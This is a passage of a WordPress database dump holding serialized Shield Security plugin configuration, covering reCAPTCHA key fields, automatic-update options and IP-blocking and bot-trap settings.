Recaptcha.\";}i:14;a:10:{s:3:\"key\";s:25:\"google_recaptcha_site_key\";s:7:\"section\";s:26:\"section_third_party_google\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:22:\"https://shsec.io/shld5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"reCAPTCHA Site Key\";s:7:\"summary\";s:67:\"Google reCAPTCHA Site Key - Only v2 or Invisible. v3 NOT supported.\";s:11:\"description\";s:67:\"Enter your Google reCAPTCHA site key for use throughout the plugin.\";}i:15;a:10:{s:3:\"key\";s:27:\"google_recaptcha_secret_key\";s:7:\"section\";s:26:\"section_third_party_google\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:22:\"https://shsec.io/shld5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:16:\"reCAPTCHA Secret\";s:7:\"summary\";s:69:\"Google reCAPTCHA Secret Key - Only v2 or Invisible. v3 NOT supported.\";s:11:\"description\";s:69:\"Enter your Google reCAPTCHA secret key for use throughout the plugin.\";}i:16;a:6:{s:3:\"key\";s:21:\"tracking_last_sent_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;s:3:\"min\";i:0;}i:17;a:5:{s:3:\"key\";s:22:\"unique_installation_id\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";i:0;}i:18;a:4:{s:3:\"key\";s:26:\"tracking_permission_set_at\";s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:19;a:5:{s:3:\"key\";s:17:\"installation_time\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:20;a:5:{s:3:\"key\";s:12:\"activated_at\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:21;a:5:{s:3:\"key\";s:33:\"importexport_secretkey_expires_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:22;a:5:{s:3:\"key\";s:33:\"importexport_handshake_expires_at\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:7:\"integer\";s:7:\"default\";i:0;}i:23;a:5:{s:3:\"key\";s:29:\"importexport_last_import_hash\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:24;a:5:{s:3:\"key\";s:21:\"last_ip_detect_source\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:25;a:5:{s:3:\"key\";s:19:\"openssl_private_key\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:4:\"text\";s:7:\"default\";s:0:\"\";}i:26;a:5:{s:3:\"key\";s:18:\"wphashes_api_token\";s:12:\"transferable\";b:0;s:7:\"section\";s:14:\"section_non_ui\";s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:16:{s:12:\"survey_email\";s:36:\"c3VwcG9ydEBvbmVkb2xsYXJwbHVnaW4uY29t\";s:13:\"help_video_id\";s:0:\"\";s:20:\"tracking_cron_handle\";s:20:\"plugin_tracking_cron\";s:17:\"tracking_post_url\";s:51:\"https://tracking.icontrolwp.com/track/plugin/shield\";s:22:\"importexport_cron_name\";s:10:\"autoimport\";s:19:\"href_privacy_policy\";s:38:\"https://shsec.io/wpshieldprivacypolicy\";s:10:\"db_classes\";a:2:{s:5:\"geoip\";s:64:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\GeoIp\\Handler\";s:5:\"notes\";s:69:\"\\FernleafSystems\\Wordpress\\Plugin\\Shield\\Databases\\AdminNotes\\Handler\";}s:19:\"db_autoexpire_notes\";i:0;s:19:\"db_autoexpire_geoip\";i:30;s:13:\"db_notes_name\";s:5:\"notes\";s:22:\"db_notes_table_columns\";a:5:{i:0;s:2:\"id\";i:1;s:11:\"wp_username\";i:2;s:4:\"note\";i:3;s:10:\"created_at\";i:4;s:10:\"deleted_at\";}s:16:\"geoip_table_name\";s:5:\"geoip\";s:19:\"geoip_table_columns\";a:5:{i:0;s:2:\"id\";i:1;s:2:\"ip\";i:2;s:4:\"meta\";i:3;s:10:\"created_at\";i:4;s:10:\"deleted_at\";}s:22:\"active_plugin_features\";a:17:{i:0;a:4:{s:4:\"slug\";s:8:\"insights\";s:11:\"storage_key\";s:8:\"insights\";s:13:\"load_priority\";i:1;s:13:\"menu_priority\";i:5;}i:1;a:3:{s:4:\"slug\";s:24:\"admin_access_restriction\";s:11:\"storage_key\";s:24:\"admin_access_restriction\";s:13:\"load_priority\";i:11;}i:2;a:3:{s:4:\"slug\";s:3:\"ips\";s:11:\"storage_key\";s:3:\"ips\";s:13:\"load_priority\";i:15;}i:3;a:2:{s:4:\"slug\";s:12:\"hack_protect\";s:11:\"storage_key\";s:12:\"hack_protect\";}i:4;a:2:{s:4:\"slug\";s:13:\"login_protect\";s:11:\"storage_key\";s:12:\"loginprotect\";}i:5;a:3:{s:4:\"slug\";s:8:\"firewall\";s:11:\"storage_key\";s:8:\"firewall\";s:13:\"load_priority\";i:1000;}i:6;a:2:{s:4:\"slug\";s:15:\"user_management\";s:11:\"storage_key\";s:15:\"user_management\";}i:7;a:2:{s:4:\"slug\";s:15:\"comments_filter\";s:11:\"storage_key\";s:14:\"commentsfilter\";}i:8;a:2:{s:4:\"slug\";s:11:\"autoupdates\";s:11:\"storage_key\";s:11:\"autoupdates\";}i:9;a:2:{s:4:\"slug\";s:7:\"headers\";s:11:\"storage_key\";s:7:\"headers\";}i:10;a:2:{s:4:\"slug\";s:8:\"lockdown\";s:11:\"storage_key\";s:8:\"lockdown\";}i:11;a:3:{s:4:\"slug\";s:6:\"events\";s:11:\"storage_key\";s:6:\"events\";s:13:\"load_priority\";i:11;}i:12;a:3:{s:4:\"slug\";s:8:\"sessions\";s:11:\"storage_key\";s:8:\"sessions\";s:13:\"load_priority\";i:5;}i:13;a:4:{s:4:\"slug\";s:11:\"audit_trail\";s:11:\"storage_key\";s:11:\"audit_trail\";s:13:\"load_priority\";i:11;s:6:\"hidden\";b:0;}i:14;a:4:{s:4:\"slug\";s:7:\"traffic\";s:11:\"storage_key\";s:7:\"traffic\";s:13:\"load_priority\";i:12;s:7:\"min_php\";s:3:\"5.4\";}i:15;a:3:{s:4:\"slug\";s:7:\"license\";s:11:\"storage_key\";s:7:\"license\";s:13:\"load_priority\";i:10;}i:16;a:2:{s:4:\"slug\";s:5:\"email\";s:11:\"storage_key\";s:5:\"email\";}}s:6:\"events\";a:10:{s:13:\"test_cron_run\";a:2:{s:5:\"audit\";b:0;s:6:\"recent\";b:1;}s:18:\"import_notify_sent\";a:1:{s:4:\"stat\";b:0;}s:22:\"import_notify_received\";a:1:{s:4:\"stat\";b:0;}s:16:\"options_exported\";a:2:{s:4:\"stat\";b:1;s:6:\"recent\";b:1;}s:16:\"options_imported\";a:2:{s:4:\"stat\";b:1;s:6:\"recent\";b:1;}s:20:\"whitelist_site_added\";a:1:{s:4:\"stat\";b:0;}s:22:\"whitelist_site_removed\";a:1:{s:4:\"stat\";b:0;}s:14:\"master_url_set\";a:1:{s:4:\"stat\";b:0;}s:17:\"recaptcha_success\";a:1:{s:5:\"audit\";b:0;}s:14:\"recaptcha_fail\";a:1:{s:5:\"audit\";b:1;}}s:7:\"wizards\";a:1:{s:7:\"welcome\";a:4:{s:5:\"title\";s:28:\"Getting Started Setup Wizard\";s:4:\"desc\";s:106:\"An introduction to this security plugin, helping you get setup and started quickly with the core features.\";s:20:\"min_user_permissions\";s:14:\"manage_options\";s:5:\"steps\";a:10:{s:7:\"welcome\";a:2:{s:14:\"security_admin\";b:0;s:5:\"title\";s:7:\"Welcome\";}s:9:\"ip_detect\";a:1:{s:5:\"title\";s:12:\"IP Detection\";}s:24:\"admin_access_restriction\";a:1:{s:5:\"title\";s:14:\"Security Admin\";}s:11:\"audit_trail\";a:1:{s:5:\"title\";s:11:\"Audit Trail\";}s:3:\"ips\";a:1:{s:5:\"title\";s:12:\"IP Blacklist\";}s:13:\"login_protect\";a:1:{s:5:\"title\";s:16:\"Login Protection\";}s:15:\"comments_filter\";a:1:{s:5:\"title\";s:12:\"Comment SPAM\";}s:16:\"how_shield_works\";a:1:{s:5:\"title\";s:16:\"How Shield Works\";}s:5:\"optin\";a:1:{s:5:\"title\";s:8:\"Join Us!\";}s:8:\"thankyou\";a:2:{s:14:\"security_admin\";b:0;s:5:\"title\";s:10:\"Thank You!\";}}}}}s:10:\"meta_modts\";i:1582303038;}','yes'),(420384,'shield_mod_config_e6c4c7e9973d941405df178603e30c94','a:6:{s:4:\"slug\";s:11:\"autoupdates\";s:10:\"properties\";a:14:{s:4:\"slug\";s:11:\"autoupdates\";s:4:\"name\";s:17:\"Automatic Updates\";s:12:\"sidebar_name\";s:12:\"Auto Updates\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:11:\"autoupdates\";s:7:\"tagline\";s:53:\"Take back full control of WordPress automatic updates\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:1;s:5:\"order\";i:60;}s:8:\"sections\";a:4:{i:0;a:5:{s:4:\"slug\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"primary\";b:1;s:5:\"title\";s:42:\"Automatic Updates For WordPress Components\";s:11:\"title_short\";s:20:\"WordPress Components\";s:7:\"summary\";a:2:{i:0;s:80:\"Purpose - Control how automatic updates for each WordPress component is handled.\";i:1;s:80:\"Recommendation - You should at least allow minor updates for the WordPress core.\";}}i:1;a:4:{s:4:\"slug\";s:15:\"section_options\";s:5:\"title\";s:19:\"Auto-Update Options\";s:11:\"title_short\";s:19:\"Auto-Update Options\";s:7:\"summary\";s:77:\"Purpose - Make adjustments to how automatic updates are handled on your site.\";}i:2;a:4:{s:4:\"slug\";s:55:\"section_enable_plugin_feature_automatic_updates_control\";s:5:\"title\";s:32:\"Enable Module: Automatic Updates\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:137:\"Purpose - Automatic Updates lets you manage the WordPress automatic updates engine so you choose what exactly gets updated automatically.\";i:1;s:62:\"Recommendation - Keep the Automatic Updates feature turned on.\";}}i:3;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:11:{i:0;a:10:{s:3:\"key\";s:18:\"enable_autoupdates\";s:7:\"section\";s:55:\"section_enable_plugin_feature_automatic_updates_control\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3w\";s:9:\"link_blog\";s:19:\"https://shsec.io/hj\";s:4:\"name\";s:24:\"Enable Automatic Updates\";s:7:\"summary\";s:48:\"Enable (or Disable) The Automatic Updates module\";s:11:\"description\";s:76:\"Un-Checking this option will completely disable the Automatic Updates module\";}i:1;a:10:{s:3:\"key\";s:29:\"enable_autoupdate_disable_all\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/3v\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:11:\"Disable All\";s:7:\"summary\";s:46:\"Completely Disable WordPress Automatic Updates\";s:11:\"description\";s:122:\"When selected, regardless of any other settings, all WordPress automatic updates on this site will be completely disabled!\";}i:2;a:10:{s:3:\"key\";s:15:\"autoupdate_core\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:10:\"core_minor\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:10:\"core_never\";s:4:\"text\";s:5:\"Never\";}i:1;a:2:{s:9:\"value_key\";s:10:\"core_minor\";s:4:\"text\";s:19:\"Minor Versions Only\";}i:2;a:2:{s:9:\"value_key\";s:10:\"core_major\";s:4:\"text\";s:24:\"Major and Minor Versions\";}}s:9:\"link_info\";s:19:\"https://shsec.io/3x\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"WordPress Core Updates\";s:7:\"summary\";s:66:\"Decide how the WordPress Core will automatically update, if at all\";s:11:\"description\";s:94:\"At least automatically upgrading minor versions is recommended (and is the WordPress default).\";}i:3;a:9:{s:3:\"key\";s:25:\"enable_autoupdate_plugins\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:7:\"Plugins\";s:7:\"summary\";s:28:\"Automatically Update Plugins\";s:11:\"description\";s:73:\"Note: Automatic updates for plugins are disabled on WordPress by default.\";}i:4;a:10:{s:3:\"key\";s:24:\"enable_autoupdate_themes\";s:7:\"section\";s:50:\"section_automatic_updates_for_wordpress_components\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:6:\"Themes\";s:7:\"summary\";s:27:\"Automatically Update Themes\";s:11:\"description\";s:72:\"Note: Automatic updates for themes are disabled on WordPress by default.\";}i:5;a:10:{s:3:\"key\";s:12:\"update_delay\";s:7:\"section\";s:15:\"section_options\";s:7:\"premium\";b:1;s:7:\"default\";s:1:\"0\";s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:19:\"https://shsec.io/e5\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Update Delay\";s:7:\"summary\";s:47:\"Delay Automatic Updates For Period Of Stability\";s:11:\"description\";s:94:\"Shield will delay upgrades until the new update has been available for the set number of days.\";}i:6;a:11:{s:3:\"key\";s:22:\"autoupdate_plugin_self\";s:7:\"section\";s:15:\"section_options\";s:8:\"advanced\";b:1;s:7:\"default\";s:4:\"auto\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:3:{i:0;a:2:{s:9:\"value_key\";s:4:\"auto\";s:4:\"text\";s:21:\"Let The Plugin Decide\";}i:1;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:2;a:2:{s:9:\"value_key\";s:9:\"immediate\";s:4:\"text\";s:19:\"As Soon As Possible\";}}s:9:\"link_info\";s:19:\"https://shsec.io/3x\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:18:\"Auto Update Plugin\";s:7:\"summary\";s:39:\"Always Automatically Update This Plugin\";s:11:\"description\";s:73:\"Regardless of any other settings, automatically update the Shield plugin.\";}i:7;a:9:{s:3:\"key\";s:33:\"enable_upgrade_notification_email\";s:7:\"section\";s:15:\"section_options\";s:7:\"default\";s:1:\"N\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"Send Report Email\";s:7:\"summary\";s:42:\"Send email notices after automatic updates\";s:11:\"description\";s:81:\"You can turn on/off email notices from automatic updates by un/checking this box.\";}i:8;a:10:{s:3:\"key\";s:22:\"override_email_address\";s:7:\"section\";s:15:\"section_options\";s:9:\"sensitive\";b:1;s:7:\"default\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:9:\"link_info\";s:0:\"\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:20:\"Report Email Address\";s:7:\"summary\";s:42:\"Where to send upgrade notification reports\";s:11:\"description\";s:65:\"If this is empty, it will default to the Site Admin email address\";}i:9;a:6:{s:3:\"key\";s:14:\"delay_tracking\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:9:\"sensitive\";b:1;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}i:10;a:5:{s:3:\"key\";s:16:\"selected_plugins\";s:7:\"section\";s:14:\"section_non_ui\";s:12:\"transferable\";b:0;s:4:\"type\";s:5:\"array\";s:7:\"default\";a:0:{}}}s:11:\"definitions\";a:1:{s:20:\"action_hook_priority\";i:1000;}s:10:\"meta_modts\";i:1611420210;}','yes'),(420378,'shield_mod_config_7e66eb2af2ac924a130c43f2966d5e86','a:10:{s:4:\"slug\";s:3:\"ips\";s:10:\"properties\";a:14:{s:4:\"slug\";s:3:\"ips\";s:4:\"name\";s:22:\"Block Bad IPs/Visitors\";s:12:\"sidebar_name\";s:11:\"IP Blocking\";s:21:\"show_module_menu_item\";b:0;s:19:\"show_module_options\";b:1;s:11:\"storage_key\";s:3:\"ips\";s:7:\"tagline\";s:68:\"Automatically detect bots and malicious visitors and stop them dead.\";s:12:\"show_central\";b:1;s:17:\"access_restricted\";b:1;s:7:\"premium\";b:0;s:18:\"run_if_whitelisted\";b:1;s:19:\"run_if_verified_bot\";b:1;s:12:\"run_if_wpcli\";b:0;s:5:\"order\";i:100;}s:10:\"menu_items\";a:1:{i:0;a:3:{s:5:\"title\";s:8:\"IP Lists\";s:4:\"slug\";s:12:\"ips-redirect\";s:8:\"callback\";s:0:\"\";}}s:16:\"custom_redirects\";a:1:{i:0;a:3:{s:15:\"source_mod_page\";s:12:\"ips-redirect\";s:15:\"target_mod_page\";s:8:\"insights\";s:10:\"query_args\";a:1:{s:4:\"inav\";s:3:\"ips\";}}}s:13:\"admin_notices\";a:1:{s:19:\"visitor-whitelisted\";a:5:{s:2:\"id\";s:19:\"visitor-whitelisted\";s:8:\"schedule\";s:10:\"conditions\";s:16:\"plugin_page_only\";b:1;s:8:\"per_user\";b:1;s:4:\"type\";s:4:\"info\";}}s:12:\"requirements\";a:1:{s:3:\"php\";a:2:{s:9:\"functions\";a:1:{i:0;s:10:\"filter_var\";}s:9:\"constants\";a:5:{i:0;s:18:\"FILTER_VALIDATE_IP\";i:1;s:16:\"FILTER_FLAG_IPV4\";i:2;s:16:\"FILTER_FLAG_IPV6\";i:3;s:25:\"FILTER_FLAG_NO_PRIV_RANGE\";i:4;s:24:\"FILTER_FLAG_NO_RES_RANGE\";}}}s:8:\"sections\";a:8:{i:0;a:5:{s:4:\"slug\";s:23:\"section_auto_black_list\";s:7:\"primary\";b:1;s:5:\"title\";s:23:\"Automatic IP Black List\";s:11:\"title_short\";s:22:\"Auto IP Blocking Rules\";s:7:\"summary\";a:2:{i:0;s:136:\"Purpose - The Automatic IP Black List system will block the IP addresses of naughty visitors after a specified number of transgressions.\";i:1;s:68:\"Recommendation - Keep the Automatic IP Black List feature turned on.\";}}i:1;a:4:{s:4:\"slug\";s:14:\"section_logins\";s:5:\"title\";s:18:\"Capture Login Bots\";s:11:\"title_short\";s:10:\"Login Bots\";s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:2;a:4:{s:4:\"slug\";s:14:\"section_probes\";s:5:\"title\";s:20:\"Capture Probing Bots\";s:11:\"title_short\";s:12:\"Probing Bots\";s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:3;a:4:{s:4:\"slug\";s:18:\"section_behaviours\";s:5:\"title\";s:30:\"Identify Common Bot Behaviours\";s:11:\"title_short\";s:14:\"Bot Behaviours\";s:7:\"summary\";a:1:{i:0;s:88:\"Recommendation - Enable to capture bots/spiders that don\'t honour \'nofollow\' directives.\";}}i:4;a:4:{s:4:\"slug\";s:37:\"section_enable_plugin_feature_bottrap\";s:5:\"title\";s:22:\"Enable Module: BotTrap\";s:11:\"title_short\";s:13:\"Enable Module\";s:7:\"summary\";a:2:{i:0;s:89:\"Purpose - BotTrap monitors a typical set of bot behaviours to help identify probing bots.\";i:1;s:54:\"Recommendation - Enable as many bot traps as possible.\";}}i:5;a:4:{s:4:\"slug\";s:21:\"section_user_messages\";s:5:\"title\";s:32:\"Customize Messages Shown To User\";s:11:\"title_short\";s:16:\"Visitor Messages\";s:7:\"summary\";a:3:{i:0;s:51:\"Purpose - Customize the messages shown to visitors.\";i:1;s:70:\"Recommendation - Be sure to change the messages to suit your audience.\";i:2;s:75:\"Hint - To reset any message to its default, enter the text exactly: default\";}}i:6;a:4:{s:4:\"slug\";s:33:\"section_enable_plugin_feature_ips\";s:5:\"title\";s:25:\"Enable Module: IP Manager\";s:11:\"title_short\";s:14:\"Disable Module\";s:7:\"summary\";a:2:{i:0;s:95:\"Purpose - The IP Manager allows you to whitelist, blacklist and configure auto-blacklist rules.\";i:1;s:123:\"Recommendation - Keep the IP Manager feature turned on. You should also carefully review the automatic black list settings.\";}}i:7;a:2:{s:4:\"slug\";s:14:\"section_non_ui\";s:6:\"hidden\";b:1;}}s:7:\"options\";a:16:{i:0;a:10:{s:3:\"key\";s:10:\"enable_ips\";s:7:\"section\";s:33:\"section_enable_plugin_feature_ips\";s:8:\"advanced\";b:1;s:7:\"default\";s:1:\"Y\";s:4:\"type\";s:8:\"checkbox\";s:9:\"link_info\";s:19:\"https://shsec.io/ea\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf26\";s:4:\"name\";s:17:\"Enable IP Manager\";s:7:\"summary\";s:41:\"Enable (or Disable) The IP Manager module\";s:11:\"description\";s:69:\"Un-Checking this option will completely disable the IP Manager module\";}i:1;a:9:{s:3:\"key\";s:19:\"transgression_limit\";s:7:\"section\";s:23:\"section_auto_black_list\";s:7:\"default\";i:10;s:4:\"type\";s:7:\"integer\";s:9:\"link_info\";s:23:\"https://shsec.io/wpsf24\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf26\";s:4:\"name\";s:13:\"Offense Limit\";s:7:\"summary\";s:72:\"Visitor IP address will be Black Listed after X bad actions on your site\";s:11:\"description\";s:280:\"A black mark is set against an IP address each time a visitor trips the defenses of the Shield plugin. When the number of these offenses exceeds specified limit, they are automatically blocked from accessing the site. Set this to 0 to turn off the Automatic IP Black List feature.\";}i:2;a:11:{s:3:\"key\";s:11:\"auto_expire\";s:7:\"section\";s:23:\"section_auto_black_list\";s:8:\"advanced\";b:1;s:7:\"default\";s:3:\"day\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:6:\"minute\";s:4:\"text\";s:6:\"Minute\";}i:1;a:2:{s:9:\"value_key\";s:4:\"hour\";s:4:\"text\";s:4:\"Hour\";}i:2;a:2:{s:9:\"value_key\";s:3:\"day\";s:4:\"text\";s:3:\"Day\";}i:3;a:2:{s:9:\"value_key\";s:4:\"week\";s:4:\"text\";s:4:\"Week\";}i:4;a:2:{s:9:\"value_key\";s:5:\"month\";s:4:\"text\";s:5:\"Month\";}}s:9:\"link_info\";s:23:\"https://shsec.io/wpsf25\";s:9:\"link_blog\";s:23:\"https://shsec.io/wpsf26\";s:4:\"name\";s:21:\"Auto Block Expiration\";s:7:\"summary\";s:65:\"After 1 \'X\' a black listed IP will be removed from the black list\";s:11:\"description\";s:249:\"Permanent and lengthy IP Black Lists are harmful to performance. You should allow IP addresses on the black list to be eventually removed over time. Shorter IP black lists are more efficient and a more intelligent use of an IP-based blocking system.\";}i:3;a:12:{s:3:\"key\";s:17:\"user_auto_recover\";s:7:\"section\";s:23:\"section_auto_black_list\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:15:\"multiple_select\";s:13:\"value_options\";a:2:{i:0;a:2:{s:9:\"value_key\";s:4:\"gasp\";s:4:\"text\";s:26:\"With Shield Bot Protection\";}i:1;a:2:{s:9:\"value_key\";s:5:\"email\";s:4:\"text\";s:44:\"Magic Email Links To Unblock Logged-In Users\";}}s:9:\"link_info\";s:19:\"https://shsec.io/f8\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:17:\"User Auto Unblock\";s:7:\"summary\";s:34:\"Allow Visitors To Unblock Their IP\";s:11:\"description\";s:73:\"Allow visitors blocked by the plugin to automatically unblock themselves.\";}i:4;a:11:{s:3:\"key\";s:17:\"request_whitelist\";s:7:\"section\";s:23:\"section_auto_black_list\";s:8:\"advanced\";b:1;s:7:\"premium\";b:1;s:7:\"default\";a:0:{}s:4:\"type\";s:5:\"array\";s:9:\"link_info\";s:19:\"https://shsec.io/gd\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:22:\"Request Path Whitelist\";s:7:\"summary\";s:22:\"Request Path Whitelist\";s:11:\"description\";s:23:\"Request Path Whitelist.\";}i:5;a:11:{s:3:\"key\";s:16:\"text_loginfailed\";s:7:\"section\";s:21:\"section_user_messages\";s:9:\"sensitive\";b:1;s:7:\"premium\";b:1;s:7:\"default\";s:7:\"default\";s:4:\"type\";s:4:\"text\";s:9:\"link_info\";s:19:\"https://shsec.io/e8\";s:9:\"link_blog\";s:0:\"\";s:4:\"name\";s:12:\"Login Failed\";s:7:\"summary\";s:62:\"Visitor Triggers The IP Offenses System Through A Failed Login\";s:11:\"description\";s:63:\"This message is displayed if the visitor fails a login attempt.\";}i:6;a:11:{s:3:\"key\";s:9:\"track_404\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:4:\"name\";s:10:\"404 Detect\";s:7:\"summary\";s:33:\"Identify A Bot When It Hits A 404\";s:11:\"description\";s:53:\"Detect When A Visitor Browses To A Non-Existent Page.\";}i:7;a:11:{s:3:\"key\";s:16:\"track_linkcheese\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:8:\"disabled\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f6\";s:4:\"name\";s:11:\"Link Cheese\";s:7:\"summary\";s:38:\"Tempt A Bot With A Fake Link To Follow\";s:11:\"description\";s:45:\"Detect A Bot That Follows A \'no-follow\' Link.\";}i:8;a:11:{s:3:\"key\";s:12:\"track_xmlrpc\";s:7:\"section\";s:14:\"section_probes\";s:7:\"premium\";b:1;s:7:\"default\";s:3:\"log\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense Counter\";}i:4;a:2:{s:9:\"value_key\";s:5:\"block\";s:4:\"text\";s:15:\"Immediate Block\";}}s:9:\"link_info\";s:19:\"https://shsec.io/fo\";s:9:\"link_blog\";s:19:\"https://shsec.io/f7\";s:4:\"name\";s:14:\"XML-RPC Access\";s:7:\"summary\";s:39:\"Identify A Bot When It Accesses XML-RPC\";s:11:\"description\";s:53:\"If you don\'t use XML-RPC, why would anyone access it?\";}i:9;a:10:{s:3:\"key\";s:17:\"track_loginfailed\";s:7:\"section\";s:14:\"section_logins\";s:7:\"default\";s:20:\"transgression-single\";s:4:\"type\";s:6:\"select\";s:13:\"value_options\";a:5:{i:0;a:2:{s:9:\"value_key\";s:8:\"disabled\";s:4:\"text\";s:8:\"Disabled\";}i:1;a:2:{s:9:\"value_key\";s:3:\"log\";s:4:\"text\";s:14:\"Audit Log Only\";}i:2;a:2:{s:9:\"value_key\";s:20:\"transgression-single\";s:4:\"text\";s:25:\"Increment Offense Counter\";}i:3;a:2:{s:9:\"value_key\";s:20:\"transgression-double\";s:4:\"text\";s:32:\"Double-Increment Offense 